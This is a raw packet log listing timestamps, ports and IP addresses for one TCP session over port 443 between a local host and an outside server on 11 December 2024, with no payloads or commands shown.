Dec 11, 2024 12:30:16.313411951 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:16.313574076 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.313574076 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.313615084 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.313632011 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:16.313721895 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.313802958 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.315270901 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:16.315299988 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:16.315490961 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.315490961 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.315522909 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:16.315541029 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.315541029 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.315675020 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.317439079 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:16.317468882 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:16.317754030 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.317784071 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:16.317934990 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.319597006 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:16.319627047 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:16.319787979 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.319787979 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.319822073 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.319822073 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.319837093 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:16.319896936 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.319978952 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.321630955 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:16.321659088 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:16.321796894 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.321798086 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.321878910 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.321878910 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.321907997 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:16.321928024 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.322066069 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.323430061 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:16.323458910 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:16.323579073 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.323579073 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.323625088 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.323636055 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:16.323673964 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.323674917 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.323824883 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.325419903 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:16.325448990 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:16.325664997 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.325664997 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.325694084 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:16.325711012 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.325828075 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.327311039 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:16.327389002 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:16.327497005 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.327569962 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.327588081 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:16.327836990 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.537949085 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:16.537964106 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:16.538045883 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:16.538151026 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.538566113 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.538604975 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:16.538897038 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.539856911 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:16.539900064 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:16.540082932 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.540082932 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.540126085 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:16.540149927 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.540150881 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.540340900 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.541897058 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:16.541939020 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:16.542113066 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.542113066 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.542156935 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:16.542176008 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.542397976 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.543797970 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:16.543838978 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:16.544006109 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.544007063 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.544054031 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.544054031 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.544054031 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.544076920 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:16.544321060 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.545974970 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:16.546015978 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:16.546171904 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.546171904 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.546235085 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.546236038 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.546258926 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:16.546525002 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.548078060 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:16.548116922 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:16.548289061 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.548401117 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.548441887 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:16.548701048 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.549890041 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:16.549930096 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:16.550097942 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.550097942 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.550141096 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.550158978 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:16.550239086 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.550355911 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.552031040 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:16.552069902 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:16.552257061 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.552393913 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.552418947 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:16.552603006 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.553925991 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:16.553966999 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:16.554130077 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.554131031 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.554176092 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.554176092 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.554197073 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:16.554234028 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.554425001 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.556348085 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:16.556382895 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:16.556574106 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.556612015 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:16.556636095 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.556808949 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.558114052 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:16.558146954 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:16.558310032 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.558310032 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.558360100 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.558360100 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.558382988 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:16.558613062 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.560195923 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:16.560235977 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:16.560417891 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.560419083 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.560458899 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:16.560484886 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.560652971 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.562072992 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:16.562114000 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:16.562319994 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.562361956 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:16.562381029 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.562521935 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.564109087 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:16.564147949 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:16.564302921 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.564304113 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.564349890 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.564349890 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.564349890 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.564373016 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:16.564549923 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.566487074 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:16.566528082 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:16.566735029 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.566735029 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.566775084 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:16.566803932 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.566941977 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.568310022 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:16.568350077 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:16.568514109 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.568514109 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.568559885 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.568578959 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:16.568645954 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.568775892 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.570225954 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:16.570288897 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:16.570507050 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.570507050 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.570548058 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:16.570749044 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.570971012 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:16.571162939 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.780348063 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:16.780363083 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:16.780446053 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:16.780601978 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.780601978 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.780643940 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:16.780670881 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.780826092 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.782331944 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:16.782371044 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:16.782509089 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.782509089 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.782552004 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.782572031 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:16.782649994 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.782649994 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.782798052 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.784306049 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:16.784344912 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:16.785028934 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.785028934 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.785073996 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:16.785094023 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.785254955 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.786075115 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:16.786113977 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:16.786277056 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.786277056 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.786319017 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:16.786340952 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.786529064 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.788014889 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:16.788055897 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:16.788229942 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.788229942 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.788275003 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.788275003 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.788275003 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.788297892 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:16.788521051 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.790632010 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:16.790673018 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:16.790846109 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.790846109 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.790895939 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.790895939 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.790918112 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:16.791125059 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.792268991 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:16.792309046 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:16.792521954 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.792521954 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.792567968 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.792588949 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:16.792619944 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.792788029 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.794269085 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:16.794311047 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:16.794548035 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.794548035 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.794588089 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:16.794810057 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.796159029 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:16.796197891 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:16.796430111 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.796430111 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.796478033 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:16.796689034 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.798180103 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:16.798238993 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:16.798376083 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.798377037 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.798420906 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:16.798439980 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.798619986 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.800710917 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:16.800751925 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:16.800888062 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.800888062 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.800937891 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:16.800956964 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.800956964 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.801157951 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.802478075 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:16.802516937 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:16.802700996 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.802700996 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.802745104 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:16.802767992 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.802925110 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.804476976 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:16.804517984 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:16.804682016 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.804682016 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.804725885 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:16.804750919 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.804821014 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.804904938 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.806701899 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:16.806741953 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:16.807243109 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.807243109 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.807286024 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.807303905 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:16.807332039 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.807491064 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.809119940 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:16.809159994 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:16.809319973 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.809319973 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.809365034 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.809365988 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.809386015 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:16.809416056 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.809568882 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.810625076 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:16.810662985 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:16.810848951 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.810908079 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.810934067 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:16.811148882 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.812865019 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:16.812905073 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:16.813096046 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.813096046 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.813148022 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:16.813165903 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.813360929 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.815373898 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:16.815414906 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:16.815664053 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.815664053 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.815710068 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.815730095 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:16.815761089 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.815951109 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.817277908 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:16.817317963 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:16.817486048 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.817486048 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.817528963 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:16.817563057 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.817600012 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.817733049 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.819245100 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:16.819286108 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:16.819457054 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.819457054 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.819502115 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.819520950 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:16.819545984 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.819709063 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:16.820890903 CET	443	49761	104.21.1.51	192.168.11.20
